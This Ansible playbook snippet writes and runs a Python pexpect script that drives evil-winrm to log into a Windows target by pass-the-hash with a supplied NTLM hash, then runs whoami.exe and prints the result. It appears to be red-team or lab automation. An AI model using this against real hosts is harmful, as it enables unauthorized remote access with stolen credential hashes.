---
- name: Create evil-winrm send whomai command
  copy:
    dest: /opt/winrm.py
    content: |
      import pexpect
      import re

      target_ip = "{{ target_ip }}"
      username = "{{ username }}"
      hash = "{{ ntlm }}"

      command = f"evil-winrm -i {target_ip} -u {username} -H {hash}"

      winrm='PS \x1b[0mC:\\Users\\Administrator\\Documents> '
      child = pexpect.spawn(command)
      child.timeout = None
      child.expect(re.escape(winrm))
      child.sendline("whoami.exe")
      child.expect(re.escape(winrm))
      child.sendline("exit")
      res = child.before + child.after
      print(res)

- name: Make thescript executable
  file:
    path: /opt/winrm.py
    mode: '0755'

- name: Run the evil-winrm
  shell: python3 /opt/winrm.py
  register: winrm_output


- name: Display the output
  debug:
    msg: "{{ winrm_output.stdout }}"
